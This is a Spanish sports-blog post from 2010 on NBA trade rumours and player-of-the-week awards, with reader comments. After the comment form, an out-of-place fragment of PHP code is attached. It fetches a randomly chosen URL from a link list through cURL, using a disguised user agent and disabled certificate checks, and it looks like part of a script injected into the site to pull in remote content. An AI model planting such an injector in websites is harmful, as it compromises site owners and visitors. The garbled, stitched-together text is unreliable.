Mucho ruído y pocas nueces

10 de February de 2010 por Love Denise

Así se podría definir la actual situación que se vive en el mercado de fichajes. Muchos son los trades y fichajes que se comentan, pero por el momento, pocos y de ínfima importancia son los que se concretan, como los contratos de 10 días firmados por Houston al base Garrett Temple, Chicago al alero Chris Richards y New Orleans al base Jason Hart.

Eso sí, como no podía ser de otra forma nuevos rumores han sido publicados en los últimos días, los más destacados los repasamos a continuación.

Febrero está siendo un mes muy frío para Washington con las fuertes nevadas de los últimos días, pero para los Wizards podría ser un mes calentito desmantelando buena parte del equipo. Los Wizards podrían desprenderse de su líder Caron Butler, el cual podría ir acompañado de Deshawn Stevenson o Mike James a cambio de Tracy McGrady. Además, las lesiones de Oden y Pryzbilla han hecho que los Blazers se fijen en Brendan Haywood y a cambio podrían ofrecer alguno de sus muchos jóvenes escoltas como Nico Batum, Martell Webster o el balear Rudy Fernández. No olvidemos tampoco los incesantes rumores de traspaso de Antawn Jamison a los Cavs.

Pero Washington no es el único equipo interesado en el expiring de McGrady y es que esos 22 millones de dólares son apetecibles para cualquiera. Chicago se suma a la larga lista de aspirantes ofreciendo a cambio a Tyrus Thomas y a Kirk Hinrich. Si esta posibilidad se concretase, los Bulls tendrían suficiente margen para ofrecer suculentos contratos a los deseados Wade o Bosh.

En Boston, los Celtics están interesados en Kevin Martin, y habrían ofrecido por él a Ray Allen, pero los Kings buscan un buen pivot, por lo que no existen muchas posibilidades de que éste traspaso se concrete.

Y pasando al apartado de noticias, Chris Kaman sustituirá el lesionado Brandon Roy en el All Star Game, siendo esta su primera participación. Y Lebron James y Russell Westbrook han sido nombrados Jugadores de la Semana en el Este y en el Oeste, respectivamente. El “elegido” promedió 35 puntos, 7 rebotes y 10 asistencias por partido, siendo, como es habitual, el hombre clave en las 3 victorías de los Cavs en esta semana y consiguiendo el galardón por quinta vez en la temporada. Por su parte, Rusell Westbrook se echó los Thunders a su espalda y promedió 19 puntos, 8 rebotes y casi 10 asistencias en los tres triunfos de su equipo. Es la primera vez que recibe este galardón esta campaña.

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues sí. Los Wizards huelen a reconstrucción que apestan. Pueden hacer alguna cosa respecto el contrato de Arenas? En el caso de Ellis los Warriors si que tenían posibilidad de romperlo unilateralmente pero no se si los Wizards incluyeron alguna clausula por locura transitoria (y no tan transitoria)

      Citar

  2. kantonyo dice:
    #2

    ¿Alguien sabe algo sobre los rumores de que los Pistons podrían irse a Pittsburgh?

      Citar

  3. Dantley2 dice:
    #3

    Creo que es un globo sonda. Los Pistons pertenecen a una mujer (ojo, que no lo digo despectivamente por el tema mujer/deporte) que lo heredó de su marido y que no parece ser una fan apasionada. A eso se le une que el área metropolitana de Detroit tiene equipos profesionales en los 4 grandes deportes. Pittsburgh no parece un destino probable, allí están los otros tres grandes deportes y no es más grande que Detroit.

    Si hay algún movimiento de venta, supongo que Las Vegas aparecería rápidamente. Pero incluso antes que Las Vegas, entiendo que en Detroit habría movimiento.

      Citar

  4. sayim dice:
    #4

    Sobre la propiedad de los Pistons no me resisto a poner un enlace a un artículo de Paniagua:

    http://www.solobasket.com/blogs/comentarios/miguel/angel/paniagua/legado/hombre/bueno/c-718.html

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>